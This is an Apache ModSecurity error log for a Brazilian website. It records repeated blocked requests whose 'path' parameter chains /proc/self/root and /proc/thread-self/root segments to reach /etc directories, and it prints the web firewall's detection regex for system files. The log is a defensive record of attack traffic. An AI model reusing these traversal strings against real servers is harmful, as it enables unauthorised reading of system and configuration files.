[Fri Mar 20 04:12:51.240390 2026] [:error] [pid 11642:tid 140411741927168] [client 74.7.243.128:36744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzc7ninkcc-iUj5AoyggAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:12:58.259009 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:53446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzeuoXxyEfFpUF8f9YfgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:13:08.637189 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.243.128:39030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzhPXLqtnMIWvjpaJuIgAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:13:45.750359 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:51536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzqBCii7xarUs8iHY51QAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:13:59.628197 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:39400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzt7ninkcc-iUj5AoyuQAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:14:09.126991 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:40466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzzwPXLqtnMIWvjpaJuUgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:14:26.245832 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:50556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzz0hCii7xarUs8iHY5_AAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:16:24.128920 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:60684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0SAF0L0L-SsrnPo49pQAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:16:41.710024 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:53280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0WfXLqtnMIWvjpaJuwwAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:16:53.979208 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:34836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0ZfqxLDW4GITHUkS3jgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:17:16.239597 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.243.128:35448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0fPXLqtnMIWvjpaJu-gAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:17:42.612684 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.243.128:50124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0lgF0L0L-SsrnPo492QAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:17:43.123505 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.243.128:50124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0lwF0L0L-SsrnPo492gAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:17:44.398070 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:33376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0mPXLqtnMIWvjpaJvBQAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:17:45.787028 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:33382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0mRCii7xarUs8iHY6lQAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:17:48.163927 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:33392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0nPXLqtnMIWvjpaJvCQAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:17:49.472518 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:52150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0nV1pVZ5mVmJwsFMGwAAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:18:14.689980 2026] [mime_magic:error] [pid 11167:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:52154] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/lib
[Fri Mar 20 04:18:23.199161 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:35630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz0v_qxLDW4GITHUkS30AAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:21:29.363290 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:51254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz1eRCii7xarUs8iHY7qwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:22:19.027251 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:35582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz1q9a6ubjKNq_cu4alpgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:22:21.507955 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:59376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz1reoXxyEfFpUF8f9Z-gAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
